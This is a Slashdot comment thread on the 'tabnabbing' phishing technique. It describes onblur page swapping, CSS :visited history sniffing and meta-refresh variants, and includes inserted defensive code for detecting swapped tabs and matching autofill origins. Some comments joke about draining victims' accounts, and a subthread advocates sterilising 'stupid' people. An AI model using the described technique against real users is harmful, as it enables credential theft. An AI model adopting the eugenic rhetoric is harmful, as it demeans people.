      OK - let's get this straight. Submitting to Slashdot is supposed to be a selfless act and "shame on me" for being disappointed that the link was replaced because, heaven forbid, I may have made a few quid from the advertising (which by the way barely covers hosting costs). Yet Slashdot makes money from advertising on the site and from the community. That's perfectly acceptable (and yes, in my eyes it is perfectly acceptable). Why shame on me?

    15. Re:A little peeved! by Anonymous Coward · · Score: 0

      It would have been nice to get the recognition for that work...

      But you do! At the very top it says "scamdetect writes".

    16. Re:A little peeved! by Qzukk · · Score: 4, Insightful

      They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening

      They're not listening, the blog post they substituted is still just someone bloviating about the original article and proof of concept.

      In action, it's scary in a way that just listening to some blogger yak about it doesn't get the point across, and the author points out how to use the :visited detectors and various hacks to detect if you've logged into a site or not to make it even scarier.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    17. Re:A little peeved! by Anonymous Coward · · Score: 0

      Slashdot is about news, not driving traffic to someone's website.

      Umm, what? You do realize the various slashdot "editors" have their own blatant biases about what sites to link to, and will certainly alter other people's submissions to suit their wants. On top of that, there are likely some behind-the-scenes agreements with the /. corporate overlords, since /. obviously needs some revenue to just operate. Ads can't be doing all that much, particularly since a good bulk of the /. crowd are blocking all ads to begin with.

    18. Re:A little peeved! by Anonymous Coward · · Score: 0

      The solution is to break a story on your blog. Then not only will your submitted links stay, but when someone else's submission gets accepted, CmdrTaco will edit the submission to point to your blog.

    19. Re:A little peeved! by satoshi1 · · Score: 2, Funny

      Because you're being a selfish prick.

    20. Re:A little peeved! by scamdetect · · Score: 3, Funny

      Because you're being a selfish prick.

      I truly value your input. Thank you.

    21. Re:A little peeved! by Anonymous Coward · · Score: 0

      More to the point, they altered your words and credited you for it. That's pretty bad, too.

    22. Re:A little peeved! by Sancho · · Score: 1

      And then it includes content that he didn't write!

    23. Re:A little peeved! by scamdetect · · Score: 1

      I would not dream of asking someone to contribute to my website and then linking to someone else's blog from their content. Would you? Of course not. Yet it's ok for /. because it's their party?

    24. Re:A little peeved! by mcgrew · · Score: 1

      Why shame on me?

      Because instead of being glad your submission was accepted (and maybe linking your own blog's take on it in a comment), you bitched about it like a spoiled little girl who didn't get her way.

      Be glad, they might have set your server on fire!

    25. Re:A little peeved! by TheThiefMaster · · Score: 1

      It's a pity they didn't replace the link with the original source. Changing the link to some other blog adds little compared to the original link (they have a link to the original themselves, you don't, that's about it), but the source of the story is what should be referenced from a slashdot link.

  11. So let me get this straight... by L4t3r4lu5 · · Score: 1

    I'm supposed to open a tab, go to a website, open a second tab, go to a compromised website which changes the content of the first tab without my interaction, and then log on to the site presented in the first tab? Don't you think that I'll notice that I'm not on the same website I was on previously?

    Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on, and not blindly click away every message box or enter details into every site they're presented with.

    --
    Finally had enough. Come see us over at https://soylentnews.org/
    1. Re:So let me get this straight... by The+MAZZTer · · Score: 3, Informative

      Some people keep 100s of tabs open. They could come back hours later and see a Gmail login screen and assume they opened it at some point.

    2. Re:So let me get this straight... by PatHMV · · Score: 1

      No, the attack knows what site you had open in tab 1, and replaces the page that had been in there with another page which appears to be from the SAME site. It will have all the right logos and so forth, and will say something like "Your Facebook session has timed out. Please log in again." ... with a very normal looking log-in button right below it. Except that you're not actually on Facebook in that tab anymore. In other words, RTFA. This is a potentially very sophisticated attack which could dupe even folks who are pretty careful about always entering web addresses directly to avoid phishing attempts.

    3. Re:So let me get this straight... by TuringTest · · Score: 1

      Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on

      Sure, and maybe throwing people from high enough cliffs will eventually teach them how to fly.

      Short-term memory is one of the well known shortcomings of the human brain. You don't design your security procedures to rely on a long human attention span, for the same reasons that you don't design memory-hungry data structures for the algorithms that run on your smartphone. If your design does it, it's not a problem with the platform.

      --
      Singularity: a belief in the "God" idea with the "demiurge" relation inverted.
    4. Re:So let me get this straight... by Anonymous Coward · · Score: 0

      I'm immune to this.

      I have the habit of never logging in from a page that says my session timed out or I entered the wrong password.
      I always go to the start page of the site again and enter from there.

      I don't know why but I always follow those steps.

    5. Re:So let me get this straight... by Qzukk · · Score: 2, Informative

      No, tab 1 is still the same site as ever, but the page you visited in tab 34 and forgot about 30 minutes ago suddenly looks like a facebook "you have timed out please log in" page. It even uses javascript to change the title of the tab and the favicon.

      Pop Quiz! Were you logged into Facebook on tab 48, tab 18, or tab 42???!?!

      All it takes is a bit of javascript inserted into a normal site using cross-site scripting, or an intentionally malicious site in the first place, or an adserver serving up whatever javascript anyone pays them to host. This is why I use NoScript.

      The original author (not linked in the submission) points out that you can use the :visited hack to choose a login screen that the user would expect to see. And you can use various other hacks to determine if the user is currently logged into some site or not.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
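The defensive counterpart to what Qzukk describes above (and to the later anonymous remark that the swap only needs window.onblur), added here as an editor's example rather than anything from the thread or from the original proof-of-concept: snapshot a tab when it loses focus, snapshot it again when focus returns, and flag a tab that silently changed its title and favicon or grew a password field while nobody was looking. The Document stand-in, the URLs and the page titles are constructed test data; the browser wiring at the end is guarded so the comparison also runs in Node.

```javascript
// Take the facts a user would rely on to recognise a tab: URL, title,
// favicon, and whether a login (password) field is present.
// `doc` is a Document (or the stand-in below); `loc` is Location-like.
function takeSnapshot(doc, loc) {
  const icon = doc.querySelector('link[rel~="icon"]');
  return {
    href: loc.href,
    title: doc.title,
    favicon: icon ? icon.getAttribute('href') : null,
    hasPasswordField: doc.querySelector('input[type="password"]') !== null,
  };
}

// Compare the blur-time and focus-time snapshots and rate the change.
// A password field that appeared while the tab was in the background is
// the strongest signal of a swapped page. Title counters such as "(3) Inbox"
// change legitimately, so a title change on its own is only a low note;
// title and favicon changing together is the pattern the thread describes.
function compareSnapshots(before, after) {
  const reasons = [];
  if (before.href !== after.href) reasons.push('url-changed');
  if (before.title !== after.title) reasons.push('title-changed');
  if (before.favicon !== after.favicon) reasons.push('favicon-changed');
  if (!before.hasPasswordField && after.hasPasswordField) {
    reasons.push('password-field-appeared');
  }
  let severity = 'none';
  if (reasons.includes('password-field-appeared')) {
    severity = 'high';
  } else if (reasons.includes('title-changed') && reasons.includes('favicon-changed')) {
    severity = 'medium';
  } else if (reasons.length > 0) {
    severity = 'low';
  }
  return { severity, reasons };
}

// Minimal Document stand-in so the check can be exercised offline.
// Constructed for this example; it answers only the two selectors used above.
function fakeDocument({ title, faviconHref = null, hasPasswordField = false }) {
  return {
    title,
    querySelector(selector) {
      if (selector === 'link[rel~="icon"]') {
        return faviconHref === null ? null : { getAttribute: () => faviconHref };
      }
      if (selector === 'input[type="password"]') {
        return hasPasswordField ? {} : null;
      }
      return null;
    },
  };
}

// The scenario from the thread, constructed: a forgotten article tab that
// has turned into a "session timed out, log in" page by the time focus returns.
// The URL is a placeholder and does not change, because nothing navigated.
function demoScenario() {
  const loc = { href: 'https://example.test/some-article' };
  const before = takeSnapshot(
    fakeDocument({ title: 'Some article', faviconHref: '/news.ico' }), loc);
  const after = takeSnapshot(
    fakeDocument({ title: 'Facebook - Log In', faviconHref: '/fb.ico', hasPasswordField: true }),
    loc);
  return compareSnapshots(before, after);
}

// Browser wiring (a content script would use this): record at blur, compare
// at focus. Only installed when a real window exists.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  let atBlur = null;
  window.addEventListener('blur', () => {
    atBlur = takeSnapshot(document, window.location);
  });
  window.addEventListener('focus', () => {
    if (atBlur === null) return;
    const verdict = compareSnapshots(atBlur, takeSnapshot(document, window.location));
    if (verdict.severity !== 'none') {
      console.warn('This tab changed while it was in the background:', verdict);
    }
    atBlur = null;
  });
}
```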
    6. Re:So let me get this straight... by PatHMV · · Score: 1

      You are correct, of course. I misunderstood my first reading of the article. Though I wonder... is it possible to change tab order or close a tab with javascript? I actually do use tab order to help keep me organized. Tab 1 is whatever I'm currently surfing, for pleasure or for work. Tab 2 is my e-mail account, tab 3 is FB. Anything after that will be tabs I've opened by choosing "open in new tab" when clicking on a link, and they almost always get closed after I read the article, though occasionally one of those tabs will stick around on, say, imdb, for awhile if I anticipate using it a lot. This pretty regular tab order should then help me avoid this particular exploit.

    7. Re:So let me get this straight... by Hurricane78 · · Score: 2, Insightful

      And it'd be their own damn fault for having such a mess.
      Seriously? You need hundreds of tabs? Did you never hear of doing first things first, and freeing your mind from other stuff? Did they never hear of bookmarks, bookmark folders and saving sessions (e.g. with TabMix Plus)?

      Sorry, but there's a point at which you just deserve it. This is one of them. Like cockroaches in an apartment that looks like a garbage dump.

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    8. Re:So let me get this straight... by cshay · · Score: 1

      There you go again, posting with a judgement about how people use their software. Let it go. You are not superior in your orderliness. I am not superior with my currently open 150 tabs. Everyone uses software differently. That is why there are preferences pages and plug-ins. Open your mind and understand that brains process things differently. Some require order, some struggle under excessive orderliness. When you accept that, you can learn to be a UI designer.

    9. Re:So let me get this straight... by cshay · · Score: 1

      As one more example, I have 90,000 messages in my inbox. Some I have never read. I don't use the trash. What I do use are very intelligent filtering and flagging and google searching to find stuff I need. This is different from your 15 messages and orderly sorted folders I am sure, but you can't say one is superior to the other. It's the way one's mind works. We are not all the same.

    10. Re:So let me get this straight... by L4t3r4lu5 · · Score: 1

      He just does the legwork of organising his stuff once, whereas you do it every time you want to find something.

      If anything, his way is better because the result is less total work. He's lazier, and therefore more organised.

      --
      Finally had enough. Come see us over at https://soylentnews.org/
    11. Re:So let me get this straight... by Anonymous Coward · · Score: 0

      I often (almost always) have over 100 tabs open. Unless I KNOW I have a tab open for a particular site, I will just open a new one to check my email. Really, when you have 100 tabs open what's one more?

    12. Re:So let me get this straight... by cshay · · Score: 1

      What are you talking about? I *never* organize anything. I rely on powerful search engines (Google Desktop) to find what I want in my inbox. I am the king of laziness.

  12. No tab? by smaerd · · Score: 1

    Just give me something without sugar!

    1. Re:No tab? by flyingfsck · · Score: 1

      That will whoosh over the heads of 99.999% of people who never heard of Coke Tab.

      --
      Excuse me, but please get off my Pennisetum Clandestinum, eh!
  13. if these geniuses by circletimessquare · · Score: 1

    who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly

    i mean this is a brilliant attack. so, whoever thought this up, why aren't you making millions in a respectable way? you obviously have the brains to do that

    some people just have to be assholes

    --
    intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
    1. Re:if these geniuses by ascari · · Score: 1

      Really? I take it you've never tried starting a business? Things like "brilliant" and "brains" often have very little to do with eventual success. Just take a look around you if you need hard evidence.

      Additionally, there are places on the planet (including parts of the US and Western Europe) where opportunities still are limited even for smart people. The Internet and associated scams have opened up possibilities for "geniuses" in such places. So if you ask those geniuses the classic question "If you're so smart how come you're not a millionaire?" they might just answer "Well I'm on my way with this new clever scam of mine."

      So in the end novel and clever forms of malfeasance might just be the "proper" action based on a cost benefit analysis. Or they might just be assholes. Or both.

    2. Re:if these geniuses by delinear · · Score: 1

      Spot on, I've met lots of socially challenged but incredibly intelligent people working in development, and I've met lots of socially adept idiots in management/ownership positions - getting ahead in business is often far more about how confident you are and how you sell yourself to others (and how good you are at making them feel important) than how brainy you are. Chances are if the average nerd comes up with a world shattering idea, he'll be lucky to get a pat on the back while his boss (or more likely his boss's boss) gets the new Ferrari - not advocating that nerds turn to crime, but I've seen this pattern far too often for it to be a mere coincidence.

    3. Re:if these geniuses by lwsimon · · Score: 1

      Agreed. My motto in business is: "Many people far less intelligent and talented than I have succeeded at this. Suck it up, and move on."

      --
      Learn about Photography Basics.
    4. Re:if these geniuses by Garble+Snarky · · Score: 2, Insightful

      A legitimate purpose like, say, significant development work on a well-known, large-scale open source project, such as Firefox?

      All you had to read was the first sentence of the summary...

    5. Re:if these geniuses by Tablizer · · Score: 1

      who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly

      Some people "naturally" get off on being sneaky and underhanded. Being evil releases endorphins in them.

  14. Solution... by morkus · · Score: 1, Interesting

    Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.

    My two cents as far as tabs go is that a window should be a window - not a collection of tabs - for the simple reason that tabs obfuscate (hide) the content within. Yes, I can see the advantages of tabs within some UIs in certain situations - for example: segmenting "general" from "advanced" preferences; stepping data through a process, or in a rich client application where data is related.

    Where tabs are a bad fit for browsing is that the data viewed in web apps is often too disparate - there is no linkage between any of the tabs within a "window" - the content of what is presented within is asynchronous and disconnected - tabs in browsers never have a true relationship with each other. Sure - you might be looking at two related sites, or two pages within a site, but tabs offer nothing (UI-wise) that a window cannot do. A new window offers a single view of a chunk of information; if you need another view, why not simply use another window? A mishmash of windows filled with tabs does not improve the UI in any way.

    1. Re:Solution... by Quantumstate · · Score: 1

      Tabs usefully group views, so I can open a window which I use for looking up some maths things, another for slashdot stories perhaps. Also current window managers aren't designed for having that many different windows open, so many applications use the tabbed approach like editors/ides.

      Tabs can provide a specialized interface for web browsing such as tree style tabs which works very well, providing another level of organisation.

    2. Re:Solution... by The_mad_linguist · · Score: 1

      Because I can avoid filling up my list of windows with dozens of instances of firefox when I'm working on a research project. If I have a bunch of tabs open, and only one window, it's far quicker to switch between OpenOffice text and back.

    3. Re:Solution... by Anonymous Coward · · Score: 0

      This isn't limited to tabs. This works with multiple browser windows as well, the only requirement is window.onblur.

    4. Re:Solution... by Iamthecheese · · Score: 1

      It certainly does improve the UI. Tabbing covers up the Windows UI problem of not being able to tell the documents you have open if you have enough of them. It does this by using extra screen real estate.
      If I open 50 Opera windows I'll see "Opera" in each button in my taskbar but unless I want to change my taskbar size dynamically not the site name or that little icon for the site. If I open 50 Opera tabs then at the top of my screen I'll see all those little icons, which lets me click on the right tab.

      --
      If video games influenced behavior the Pac Man generation would be eating pills and running away from their problems.
    5. Re:Solution... by bhtooefr · · Score: 1

      Because most OSes have very poor window management, and Alt-Tab gets REALLY ANNOYING when you've got 50 windows open, 30 of them browser windows. Tabs at least give you Ctrl-Tab as an option for navigating the browser windows.

      (Alternately, there is always the Mac route, where Cmd-Tab switches programs, and Cmd-` switches windows within a program.)

    6. Re:Solution... by milgr · · Score: 1

      The tabs are related... they are all web pages. I have about 25 tabs open in each of 2 Firefox windows. I also have numerous other windows on each of 7 virtual screens on each of 2 physical screens. Before the days of tabs, it was challenging to find the correct window. Now, for a web page I merely look in my browser tab list.

      Hmm... maybe I should create a new SELinux sandbox for Firefox for each web page I visit, and avoid tabs.

      --
      Where law ends, tyranny begins -- William Pitt
    7. Re:Solution... by jamesh · · Score: 1

      My two cents as far as tabs go, is that a window should be a window - not a collection of tabs

      And what is the task bar in Windows? I used multiple windows before the days of tabs, and they just ended up being a bunch of 'tabs' in the task bar, mixed in with a whole load of things even less related. I have 30 tabs open right now in firefox, and about 35 windows. If I could find a good tabbed version of putty i'd use that and it would cut down my window count by about 12.

      I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.

      So... having used non-tabbed and tabbed browsers, and greatly preferring tabs, I should stop using them because they "break a heap of good UI principles"? Take a guess where you can stick your principles :)

    8. Re:Solution... by value_added · · Score: 1

      I have about 25 tabs open in each of 2 Firefox windows. I also have numerous other windows on each of 7 virtual screens on each of 2 physical screens.

      Out of curiousity, what is it that's open in those 25 tabs?

      I've never encountered a reason to open more than a handful at a time. I can't even imagine opening that many multiplexed terminals in screen, irrespective of how many jobs I was running, or how many systems I was working on.

    9. Re:Solution... by OneAhead · · Score: 1

      Well, some people like to browse many sites at the same time. In the pre-firefox days, I used to have a gazillion windows open, which made it really annoying to switch to another task. When firefox came out with its tabbed browsing, I felt it was the best thing since sliced bread.

      Now, disabling tabbed browsing would bring me back to the bad old days of multiple open windows. However, the exploit would still work as advertised, only with windows instead of tabs. In this respect, "tabnabbing" is a bit of a misnomer, one could argue it should be "window nabbing". I guess this shows how popular tabbed browsing is.

    10. Re:Solution... by phiwum · · Score: 1

      Simple solution - don't use tabs in browsers.

      I don't think this solution fixes anything. As near as I can figger, the guy that uses multiple windows (instead of tabs) is just as vulnerable to this issue as the tab user --- assuming that his top window(s) block the view of other browser windows entirely. The only real issue I see in the article is that, when your attention is diverted from a page and it is hidden from your view, its contents may be changed.

      So, tabs are, as far as I can tell, a red herring here. It's not really about tabs at all. (Someone may correct me if I've missed something.)

      The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.

      Thank goodness that your loyalty to UI principles does not restrict my browser's features. I don't want a dozen browser windows, taking up space on the screen and making it difficult to find what I want. I want one window with tabs that have visible icons and (partially visible) titles, so that I can pick the right tab quickly.

      Maybe it is an inconsistent use of the ideas of tabs, but it's damned useful nonetheless.

      In any case, your primary criticism about tabs has nothing to do with this security issue.

      --
      Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
    11. Re:Solution... by Qzukk · · Score: 1

      Simple solution - don't use tabs in browsers.

      So, how many windows do you have open before you forget whether or not you logged into gmail in one of them? Did you memorize the position of the gmail window on your task bar, or are you going to alt-tab through them and stop at the first one that tells you you've been logged out of gmail and need to log in again?

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    12. Re:Solution... by satoshi1 · · Score: 1

      If I'm doing research or looking up API, I can easily hit 30-40+ tabs. I'll open a bunch of search results in tabs and then filter them. I keep the best ones open, and then look up the next thing I need to know. Eventually I've got everything I need right there, and it's really easy to switch between them all.

    13. Re:Solution... by Garble+Snarky · · Score: 1

      Why stop at windows? You should have a separate monitor for each application. That's the only way to prevent all content from ever being obfuscated.

    14. Re:Solution... by Kazoo+the+Clown · · Score: 1

      Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.

      HEAR HEAR. I've always hated browser tabs, for pretty much the same reasons. I suppose if you are running a browser on a system that doesn't do anything else but web browse, they're fine, but tabs should combine any function you might be doing, not just on the web (document editing, etc.) So on Linux and on Windows at least (and I suspect on the Mac as well), they're completely redundant and don't integrate with the OS very well in that regard (if you hadn't noticed, the TASKBAR implements the equivalent of tabs, and I move it to the left-hand-side of my screen so that there's more useful real-estate for that purpose). I gave up on Firefox for that reason, as while it supposedly has a tab disable, it is incomplete as pages still end up opening on tabs now and then-- I moved to K-Meleon, and while based on the Firefox source base it doesn't seem to have that problem...

    15. Re:Solution... by Anonymous Coward · · Score: 0

      Why do you use windows? When a window is covered by another window, that obfuscates the content within. And all those windows together obfuscate the desktop. Windows are disconnected and asynchronous between them. It's so confusing. Why can't all desktops be like an old-style phone, where you can only do one thing at a time, and do it well? Our brains are just not made for parallel processing and keeping stuff in the background to get back to it later. When you eat, eat. When you tweet, tweet.

  15. Noscript by Wonko+the+Sane · · Score: 3, Informative

    This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.

    1. Re:Noscript by 0ld_d0g · · Score: 1

      Agree, but sometimes JS files are hosted off separate domains, etc, making white-listing a pain.

    2. Re:Noscript by Anonymous Coward · · Score: 0

      God I love this add-on, it stops so very many of these things.

    3. Re:Noscript by PRMan · · Score: 1

      Noscript FTW!

      --
      Peter predicted that you would "deliberately forget" creation 2000 years ago...
    4. Re:Noscript by ShadowRangerRIT · · Score: 1

      Or you're so used to occasional websites that are completely unusable without JavaScript that you are willing to temporarily whitelist them.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
    5. Re:Noscript by carp3_noct3m · · Score: 1

      One more reason I love noscript.

      --
      "It's ok, I'm completely secure as long as my iron is off"
    6. Re:Noscript by Animats · · Score: 1

      This attack only works if you allow Javascript...

      You could do this with a <meta refresh> tag, have the server recognize the referring page, and load the new, hostile page. This attack doesn't need JavaScript.

    7. Re:Noscript by Wonko+the+Sane · · Score: 1

      That would be less effective, as that way there's no assurance that the target isn't viewing the tab when it refreshes.

    8. Re:Noscript by Anonymous Coward · · Score: 0

      Also if you use a good password manager that only auto-fills on the correct domain name you would not be vulnerable to this type of attack. I use 1password on the mac which works pretty well.

    9. Re:Noscript by Hurricane78 · · Score: 1

      And guess which sites will include this via cross-site scripting?
      Exactly. The big sites that you trust. ^^

      That’s why NoScript is pointless. The biggest sites are also attacked and hacked the most. If you disable JS there, you could as well just disable it everywhere.

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    10. Re:Noscript by Animats · · Score: 1

      there's no assurance that the target isn't viewing the tab when it refreshes.

      True, but phishing, like spamming, is a high-volume low-success-rate scam. It doesn't have to work all the time.

    11. Re:Noscript by TorKlingberg · · Score: 1

      Couldn't this be done with Meta-Refresh?

    12. Re:Noscript by Anonymous Coward · · Score: 0

      I don't think you'd need JavaScript at all to execute this kind of attack. A simple meta refresh tag and some CSS that tells the server which sites you have visited should do the trick.

      http://ha.ckers.org/weird/CSS-history.cgi
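The password-manager point made earlier in this thread (only autofill on the correct domain name) is the one defence here that does not depend on the user noticing anything, so here is an added example of that check, written for this page rather than taken from it or from any real password manager. It runs under Node using the built-in WHATWG URL class; the vault entries and the probe URLs are constructed sample data, and the ".test"/".example" hosts are placeholders. A tabnabbed tab keeps its original (attacker) origin however much its title, favicon and body now resemble webmail, so a strict origin match never fills it, whereas a "does the hostname contain the saved host" check is also defeated by a lookalike host:

```javascript
'use strict';

// Constructed sample vault: credentials are keyed by the exact origin
// (scheme + host + port) they were saved on, never by a substring of the
// host or by anything the page itself controls (title, favicon, body).
const SAVED = [
  { origin: 'https://mail.example-webmail.test', user: 'alice' },
  { origin: 'https://bank.example.test', user: 'alice-bank' },
];

// Normalise a page URL to its origin, or null if it can never be matched:
// non-http(s) schemes (data:, blob:, javascript:, about:) have opaque origins.
function pageOrigin(href) {
  let u;
  try { u = new URL(href); } catch (e) { return null; }
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
  return u.origin;
}

// Strict matcher: autofill only when the page origin equals the saved origin.
// An http:// copy of an https:// site, a different port, or a host that merely
// starts with the saved host all fail this comparison.
function credentialsFor(href, vault = SAVED) {
  const origin = pageOrigin(href);
  if (origin === null) return [];
  return vault.filter(e => e.origin === origin);
}

// Weak matcher for contrast: "does the hostname contain the saved host?"
// This is the kind of check a lookalike host defeats.
function naiveMatch(href, vault = SAVED) {
  let host;
  try { host = new URL(href).hostname; } catch (e) { return []; }
  return vault.filter(e => host.includes(new URL(e.origin).hostname));
}

// Stand-alone run over constructed probes.
const probes = [
  'https://mail.example-webmail.test/login?next=inbox',  // genuine site
  'https://mail.example-webmail.test.evil.test/login',   // lookalike host
  'http://mail.example-webmail.test/login',              // scheme downgrade
  'https://mail.example-webmail.test:8443/login',        // different port
  'http://cat-pictures.example/gallery',                 // tabnabbed tab, decoy form
  'data:text/html,<form><input name=pass></form>',       // opaque origin
];
for (const p of probes) {
  console.log(p.padEnd(56), 'strict:', credentialsFor(p).length, 'naive:', naiveMatch(p).length);
}
```

The strict matcher is a pure function of the page origin, which is the one thing a tabnabbing page cannot rewrite from inside itself; everything it can rewrite is deliberately ignored.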

  16. Can Javascript do this? by Yvan256 · · Score: 1

    Can Javascript really access other tabs or windows? Shouldn't it be restricted to its own page/tab/window?

    1. Re:Can Javascript do this? by Anonymous Coward · · Score: 0

      It probably should be restricted, and maybe it is in some browsers. Anyway, I think tab process separation in IE and Chrome should indirectly prevent this exploit. Browser tabs in multiple processes would be unable to communicate, and a Javascript tab-interprocess ability is (AFAIK) an unwarranted feature and therefore unlikely to exist.

    2. Re:Can Javascript do this? by canajin56 · · Score: 1

      It's not changing another tab. Here's how it works: Somebody posts a link to "Cute cat pictures!" which is just a website with a bunch of pictures. You click it, you look around, you laugh, you go back to facebook (and here's the important part) without closing the cat pictures tab. Hours later you look back at that tab and it's your banks login page. Now, hopefully almost everybody will see that and go "I never opened that tab", and also notice that the URL is wrong. However, there will probably be enough morons who say "Oh, convenient, I needed to pay my bills!" and login immediately. The script never has to touch a tab other than the one it's running in.

      --
      ASCII stupid question, get a stupid ANSI
    3. Re:Can Javascript do this? by Qzukk · · Score: 1

      Can Javascript really access other tabs or windows

      No.

      The attack here is that you have 50 tabs open, and suddenly tab 32 (the tab that was supposed to be a funny cat video but was running the Evil Script) turns into a facebook login page saying that your session expired. Were you logged into facebook on tab 32? Are you SURE?

      Don't use facebook? That's OK, the :visited CSS hack can be used to pick a login screen that you do use.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    4. Re:Can Javascript do this? by delinear · · Score: 1

      Yes, JavaScript has always been able to do this, and while it might provide slightly better security to not allow a script in one window to alter another window, there are legitimate uses that would have to be worked around (and eventually you have an entirely secure system that nobody can use at all, the line has to be drawn somewhere).

    5. Re:Can Javascript do this? by Anonymous Coward · · Score: 0

      Yes, in fact controlling multiple windows in JavaScript is quite trivial. If the code on Window1 opens Window2 in JavaScript (and you can substitute Tab1 and Tab2 for this as well), then Window2 need only call "self.opener" or "self.parent" to access Window1. There may be some subtle differences between "self.opener" and "self.parent", but those are an exercise for the reader (read: too damn lazy to look it up right now).

    6. Re:Can Javascript do this? by vlueboy · · Score: 1

      Having various tabs open, I've seen thumbnail image sites where requesting a special image opens up a single large popup window for the entire site. All my tabs for the site send image updates to just the one popup, without opening other unnecessary ones until I close it. Since most sites lack this discriminate control over how they open and control a separate window, I'd say "yes." They probably do it by window title or something.

      Submarine features are scary... HTML5 enables sites to save data to a mandatory browser-side DB (see "todo" lists, for example.) Though this has even more potential than cookies for misuse, Safari and Firefox currently auto-allow the feature and give you no control over it.

    7. Re:Can Javascript do this? by Yvan256 · · Score: 1

      No control over it?

      Safari -> Preferences -> Security -> Database Storage (Set to "None")

    8. Re:Can Javascript do this? by vlueboy · · Score: 1

      The browser's option fails to give context and mention HTML5, but thanks. My version says, more or less, "Default storage to save databases" and defaults to 100MB.

    9. Re:Can Javascript do this? by Anonymous Coward · · Score: 0

      It is restricted to its own tab. It changes the content of its own tab when the tab loses focus (window.onblur event).

  17. Losing your cookies every 24 hours by tepples · · Score: 1

    like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?

    A lot of web sites periodically invalidate session cookies after 24 hours. In that case, the next link you click even on the legitimate site will present a login screen.

  18. Re:MOD PARENT DOWN by scamdetect · · Score: 0, Troll

    Not trolling, just peeved that my link was ripped out yet the body of the story is identical

  19. Awesome ! Thanks for the tip. by Anonymous Coward · · Score: 0

    Now to get to work. Those accounts aren't just going to empty themselves now are they?

  20. Re:Greeted with Logins by Anonymous Coward · · Score: 1, Interesting

    No, because this is REALLY dangerous for Yahoo Mail.

    I'm logged in, and it likes to revert back to login pages all the time! It even makes you login twice "to check your security". So this TabMcNab exploit is going to be really dangerous somewhere. I'm pretty sharp, but that page has cried wolf so many times I would have fallen for this if it was grade-A delivered.

  21. Re:MOD PARENT DOWN by Anonymous Coward · · Score: 0

    You're trolling. This is CmdrTaco's site. Just be glad kdawson didn't get your story, or he would have put "pwned" in the title. Your link doesn't matter. Get over it.

  22. Protect Those Morons ... for some reason by Anonymous Coward · · Score: 1, Insightful

    i am so goddamned tired of hearing these stories that say "oh noes, stupidity might be painful, what will we do, it's so terrible, simpwy tewwible!" if you are stupid you should not breed. if you are stupid, nature has only ever had one cure for that, a little good old Darwinism natural selection. why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

    1. Re:Protect Those Morons ... for some reason by Anonymous Coward · · Score: 0

      ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

      Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.

    2. Re:Protect Those Morons ... for some reason by Anonymous Coward · · Score: 1, Insightful

      ... why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

      Certain 'officials' would not get elected if that was to happen. Doesn't matter which party.

      that's one of the many network effects of having so many stupid people. we should have thought a whole lot harder about protecting people from themselves and defeating natural selection. making hard drugs illegal, putting warning labels on rat poison telling people not to eat it, labels on coffee telling people that a drink prepared with boiling water is hot, food stamps and WIC and other programs that don't first require that the men get a vasectomy and the women get their tubes tied, "fat acceptance" movements, and the notion that a homeowner could ever be held responsible for shooting an intruder who breaks into his home are just a few examples.

    3. Re:Protect Those Morons ... for some reason by obyom · · Score: 1

      why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

      Why surgically?

    4. Re:Protect Those Morons ... for some reason by BillGod · · Score: 1

      I think we should to nothing. No one should run antivirus! No firewalls. Nothing I hate them all. I think the virus makers should make more and more and more viruses every day. Infect the world!!! Oh yeah BTW I own a computer repair store so I might be a little biased :)

      --
      MISSING - Sig file. 2 years old black and white and very funny. If found please email me.
    5. Re:Protect Those Morons ... for some reason by ckaminski · · Score: 1

      Intelligence has never had anything to do with Darwinism. Probably quite the opposite. The intellectuals proselytize while the neanderthals fuck everything that moves.

    6. Re:Protect Those Morons ... for some reason by BurtCrep · · Score: 1

      why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?

      Because...

      You said it: they're morons with money. It's that same money banks need in order to keep growing. And as you know, growth of your customer base is the foundation of capitalism. You can't even sterilize them, that would be bad for business...

    7. Re:Protect Those Morons ... for some reason by TheCrayfish · · Score: 1

      Your comment assumes that stupidity is the lesser-fit adaptation compared with intelligence. I'm not sure nature supports that assumption. Cockroaches are significantly stupider than humans, and yet they are clearly the more successful species, at least in terms of numbers and longevity, from a Darwinian point of view. Have you noticed that "stupid" people seem to reproduce faster and in greater numbers than "intelligent" people? Personally, I think the jury remains out on whether intelligence of the kind humans possess represents an evolutionary advantage in the long term.

